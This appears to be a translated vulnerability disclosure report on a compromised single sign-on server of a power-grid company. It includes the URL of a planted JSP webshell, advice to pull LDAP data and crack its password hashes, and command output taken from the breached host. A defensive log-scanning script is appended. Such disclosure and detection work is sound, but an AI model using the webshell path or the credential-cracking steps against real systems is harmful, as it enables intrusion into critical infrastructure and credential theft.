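2015-12-21: Details reported to the vendor; awaiting vendor handling
2015-12-21: Vendor confirmed; details disclosed to the vendor only
2015-12-31: Details disclosed to core white hats and experts in related fields
2016-01-10: Details disclosed to regular white hats
2016-01-20: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public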
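As the title says.
The SSO login system uses CAS backed by LDAP. Download the LDAP data files, or use ldapexplorer, and decrypt (LDAP generally uses SSHA as the password hash algorithm). This system is the core authentication system. A shell has already been obtained and the internal network is reachable. Site: http://iscsso.sgcc.com.cn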
210.77.176.229:80 China National Electric Power Information Network
http://iscsso.sgcc.com.cn/isc_sso/login?service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2Fsgcis%2Fworkspace%2Fdefault.jsp
shell http://iscsso.sgcc.com.cn/isc_sso/jspspy.jspx

PS F:\> ping iscsso.sgcc.com.cn
Pinging iscsso.sgcc.com.cn [210.77.176.229] with 32 bytes of data:
++++++++++++++++++++++++++++++++++++++++++++
ls
autodeploy
bin
cas.log
cas.log.1
cas.log.2
cas.log.3
config
console-ext
fileRealm.properties
init-info
lib
perfStats.log
security
servers
startManagedWebLogic_readme.txt
startWebLogic.sh
tmp

ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:9A:0D:BE
     inet addr:10.3.22.13 Bcast:10.3.22.255 Mask:255.255.255.0
     UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
     RX packets:21030644 errors:0 dropped:0 overruns:0 frame:0
     TX packets:19477545 errors:0 dropped:0 overruns:0 carrier:0
     collisions:0 txqueuelen:1000
     RX bytes:5766569714 (5.3 GiB) TX bytes:13755777092 (12.8 GiB)
lo   Link encap:Local Loopback
     inet addr:127.0.0.1 Mask:255.0.0.0
     UP LOOPBACK RUNNING MTU:65536 Metric:1
     RX packets:23360 errors:0 dropped:0 overruns:0 frame:0
     TX packets:23360 errors:0 dropped:0 overruns:0 carrier:0
     collisions:0 txqueuelen:0
     RX bytes:1967649 (1.8 MiB) TX bytes:1967649 (1.8 MiB)

uname -a
Linux iscwwatt3 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
id
uid=400(weblogic) gid=400(bea) groups=400(bea)
/app/weblogic/Oracle/Middleware/user_projects/domains/sso_domain
find -name weblogic.xml
./servers/sso3/stage/isc_sso/isc_sso/WEB-INF/weblogic.xml
./servers/sso3/tmp/_WL_internal/bea_wls_cluster_internal/hoqa3m/war/WEB-INF/weblogic.xml
./servers/sso3/tmp/_WL_internal/bea_wls9_async_response/paujim/war/WEB-INF/weblogic.xml
./servers/sso3/tmp/_WL_internal/bea_wls_internal/d0811e/war/WEB-INF/weblogic.xml

http://iscsso.sgcc.com.cn/isc_sso/jspspy.jspx
tail ./logs/access.log
10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.130%3A8103%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.129%3A8104%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.129%3A8103%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:31 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.129%3A8101%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "POST /isc_sso/login;jsessionid=ZGt9W22KTK9b5NKLwTXlGx7y5s3T3Cwx3S8T2k4cKnxQ791jhcSv!-2042157050?service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2Fsgcis%2Fworkspace%2Fdefault.jsp HTTP/1.1" 302 427
10.3.22.253 - - [20/Dec/2015:22:42:31 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.136%3A8104%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:31 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.134%3A8104%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:32 +0800] "POST /isc_sso/login;jsessionid=hpjXW22PQ7qMFG9nVtnz2Lh4BBpfHhQ29CTW2bGgXHppSjD1Yylg!-2042157050?service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2F%2Fsgcis HTTP/1.1" 302 385
10.3.22.253 - - [20/Dec/2015:22:42:33 +0800] "GET /isc_sso/serviceValidate?ticket=ST-32842-OthjrbdjjwgHcb7fgEac-cas01.example.org&service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2F%2Fsgcis&filter-name=ValidationFilter HTTP/1.1" 200 639
10.3.22.253 - - [20/Dec/2015:22:42:34 +0800] "GET /isc_sso/f5HealthMonitor.jsp HTTP/1.1" 200 226

root 292 0.0 0.0 0 0 ? S Nov19 0:00 [deferwq]
root 325 0.0 0.0 0 0 ? S Nov19 0:00 [kdmremove]
root 326 0.0 0.0 0 0 ? S Nov19 0:00 [kstriped]
root 430 0.0 0.0 0 0 ? S Nov19 0:00 [scsi_eh_0]
root 431 0.0 0.0 0 0 ? S Nov19 0:00 [scsi_eh_1]
root 438 0.0 0.0 0 0 ? S Nov19 0:00 [scsi_eh_2]
root 439 0.0 0.0 0 0 ? S Nov19 0:00 [vmw_pvscsi_wq_2]
root 590 0.0 0.0 0 0 ? S Nov19 0:00 [kdmflush]
root 592 0.0 0.0 0 0 ? S Nov19 0:00 [kdmflush]
root 616 0.0 0.0 0 0 ? S Nov19 2:34 [jbd2/dm-1-8]
root 617 0.0 0.0 0 0 ? S Nov19 0:00 [ext4-dio-unwrit]
root 701 0.0 0.0 11084 1176 ? S<s Nov19 0:00 /sbin/udevd -d
root 912 0.0 0.0 0 0 ? S Nov19 1:30 [vmmemctl]
root 1383 0.0 0.0 11084 1208 ? S< Nov19 0:00 /sbin/udevd -d
root 1384 0.0 0.0 11080 1196 ? S< Nov19 0:00 /sbin/udevd -d
root 1427 0.0 0.0 0 0 ? S Nov19 0:00 [jbd2/sda1-8]
root 1428 0.0 0.0 0 0 ? S Nov19 0:00 [ext4-dio-unwrit]
root 1470 0.0 0.0 0 0 ? S Nov19 0:06 [kauditd]
root 1630 0.0 0.0 0 0 ? S Nov19 1:14 [flush-253:1]
root 1823 0.0 0.0 179320 4340 ? S Nov19 34:04 /usr/sbin/vmtoolsd
root 1913 0.0 0.0 93176 888 ? S<sl Nov19 0:18 auditd
root 1938 0.0 0.0 251396 3700 ? Sl Nov19 0:10 /sbin/rsyslogd -i /var/run/syslogd.pid -c 5
root 1967 0.0 0.0 10948 680 ? Ss Nov19 14:47 irqbalance --pid=/var/run/irqbalance.pid
rpc 1985 0.0 0.0 18976 980 ? Ss Nov19 0:05 rpcbind
dbus 2086 0.0 0.0 21796 1468 ? Ss Nov19 0:31 dbus-daemon --system
root 2113 0.0 0.0 188900 3404 ? Ss Nov19 0:00 cupsd -C /etc/cups/cupsd.conf
root 2141 0.0 0.0 4080 648 ? Ss Nov19 0:00 /usr/sbin/acpid
68 2150 0.0 0.0 38988 3800 ? Ssl Nov19 0:46 hald
root 2151 0.0 0.0 20400 1164 ? S Nov19 0:00 hald-runner
root 2192 0.0 0.0 22520 1084 ? S Nov19 0:00 hald-addon-input: Listening on /dev/input/event2 /dev/input/event0
68 2198 0.0 0.0 18008 1028 ? S Nov19 0:00 hald-addon-acpi: listeni
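Severity: High
Vulnerability Rank: 15
Confirmed: 2015-12-21 11:22
Thank you for the submission.
2015-12-31: Thank you for your help; please contact the vendor to receive your gift.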
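
A defender-side check for the situation in this report, where a .jspx page that is not one of the SSO endpoints was reachable under /isc_sso/: scan access.log entries in the format quoted above and flag successfully served JSP/JSPX paths that are not on a known-good list. This is an added example, not code from the report or the vendor; the allowlist contents, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re

# Assumption: the only script/servlet paths this application should serve,
# taken from the requests visible in the report's access.log excerpt.
ALLOWED = {"/isc_sso/login", "/isc_sso/serviceValidate",
           "/isc_sso/f5HealthMonitor.jsp"}
SCRIPT_EXT = (".jsp", ".jspx")

# host ident user [time] "METHOD target PROTO" status bytes
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

def normalise(target):
    """Strip the query string and any ;jsessionid=... path parameter."""
    return target.split("?", 1)[0].split(";", 1)[0]

def find_unexpected_scripts(lines):
    """Return (src, ts, method, path, status) for 2xx JSP/JSPX hits not in ALLOWED."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not an access-log record (blank or truncated line)
        path = normalise(m["target"])
        if path in ALLOWED:
            continue
        # A 2xx answer means the container actually executed or served the page.
        if path.lower().endswith(SCRIPT_EXT) and m["status"].startswith("2"):
            hits.append((m["src"], m["ts"], m["method"], path, int(m["status"])))
    return hits

# Constructed sample lines in the same format as the excerpt (not real traffic).
SAMPLE = [
    '10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "GET /isc_sso/login?service=http%3A%2F%2Fapp.example.test HTTP/1.1" 200 13866',
    '10.3.22.253 - - [20/Dec/2015:22:42:31 +0800] "POST /isc_sso/login;jsessionid=CONSTRUCTED!-1?service=http%3A%2F%2Fapp.example.test HTTP/1.1" 302 427',
    '10.3.22.253 - - [20/Dec/2015:22:42:34 +0800] "GET /isc_sso/f5HealthMonitor.jsp HTTP/1.1" 200 226',
    '10.3.22.253 - - [20/Dec/2015:22:43:02 +0800] "POST /isc_sso/not_in_release.jspx HTTP/1.1" 200 5120',
    '10.3.22.253 - - [20/Dec/2015:22:43:05 +0800] "GET /isc_sso/missing.jsp HTTP/1.1" 404 1214',
]

if __name__ == "__main__":
    for hit in find_unexpected_scripts(SAMPLE):
        print("unexpected script page served:", hit)
```

The allowlist is best generated from the deployed application archive rather than maintained by hand, so any script page that appears outside a release is reported.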